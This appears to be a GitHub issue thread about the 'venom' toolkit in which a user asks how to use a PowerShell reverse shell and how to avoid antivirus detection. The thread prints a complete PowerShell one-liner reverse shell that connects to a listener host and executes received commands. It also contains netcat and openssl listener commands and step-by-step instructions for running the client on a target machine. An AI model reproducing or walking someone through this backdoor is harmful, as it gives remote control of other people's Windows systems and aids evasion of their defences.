Structure of Update-KB457147.ps1 about venom HOT 17 CLOSED

Also I wanted to ask that for this powershell reverse shell, NetCat Listener will work or not?
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.1.2",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

from venom.

• 1º - the 1º screenshot its not the payload (Client) [Reverse TCP Powershell Shell] ..
  its the dropper|launcher file that going to download/execute the payload (Client) ...

This is the payload (Client) [Reverse TCP Powershell Shell]

• 2º - yes netcat can be used to recive the connection back of that reverse shell ..
  But it will not work on venom amsi evasion 2º agent because it depends of SSL ..
  so.. to recive the connection back on the 2º agent its required one SSL listenner ..

openssl s_server -quiet -key key.pem -cert cert.pem -port <lport> <-- SSL handler|Listeneer

from venom.

Ok!

And do you know any one liner payloads in Power Shell, I tried all which are available on Google an Github but they are getting detected. Or maybe if you can give me a source on Writing a Backdoor in Powershell?

from venom.

How to make 'oneliners'

Powershell uses ; to Join commands
get-date;Test-NetConnection|Select-Object -expandproperty InterfaceAlias

C++ uses ; to Join commands
nret = recv(my_socket, (char *)startb, len - tret, 0);startb += nret;tret += nret

VBS uses : to Join commands
Set objShell = CreateObject("Wscript.Shell"):objShell.Run "cmd.exe /c start calc.exe"

Bash uses && to Join commands
echo "hello" && echo "world"

Etc,etc,etc..

To writte tcp shells we need to study sockets in the language we are going to need ..

from venom.

Are you having any sample backdoor which you can give me for now?
In powershell

from venom.

you can use this onelinner powershell reverse TCP shell
you just need to change LHOST|LPORT settings
and start one netcat listenner sudo nc -lvp <port-number-used-by-client>

from venom.

OhK! So all i have to is to replace the LHOST and LPORT and run it with netcat

from venom.

I found the code in the pic, But now do I have to copy all the lines from the
#Build Reverse Powershell Shell to the echo writer.close socket.close?

Also can you explain this me a bit? How can I use this code?
Because this is a bit confusing what to do!

from venom.

Hi!

I copied your script to PowerShell ISE and it gave me errors like this

from venom.

Offcourse it gives errors .. because some variable declarations are empty (none user inputs)

from venom.

Ok, So now explain me in deep to what to do with this source code ??

from venom.

its the Client ...

i advice you to use this oneliner insted ..
#65 (comment)

from venom.

Ok! I will use that client but, As it is giving me errors, What should I do? Should I run the Program in Kali Linux?? Please specify a bit more! (i AM EXTREMELY SORRY FOR DISTURBING YOU BECAUSE I AM NOT GOOD IN POWERSHELL)

from venom.

this client only works againts MICROSOFT systems ....

• 1º - change the Client LHOST and LPORT variables
• 2º - in ATTACKER machine execute the listenner
  sudo nc -lvp <PORT-NUMBER-USED-BY-CLIENT>
• 3º - execute the client.ps1 on ISE (target machine)

from venom.

Ok! I will try it tomorrow and tell you!
And while changing the $lport and $lhost variables, Should I change it like this $10.0.2.4 $443

from venom.

$ <--- its how we define an variable declaration in powershell
so dont use it ..
just change 192.168.1.2 (LHOST) and 4444 (LPORT)

example of PS variables

## define a variable
$myvariable = "hello world"

## print variable on screen
echo "$myvariable "

FInal Note

If you want to understand .. then help me in my projects like this guy have did ...

note-to-self

update meterpeter in venom and mabee add the client.exe|Server.exe build ??? (need to check if AV flags this now)

from venom.

Hi!
I used this one liner which you told earlier #65 (comment)
But it is getting detected, How can I use this script (Whic you made) #65 (comment)

from venom.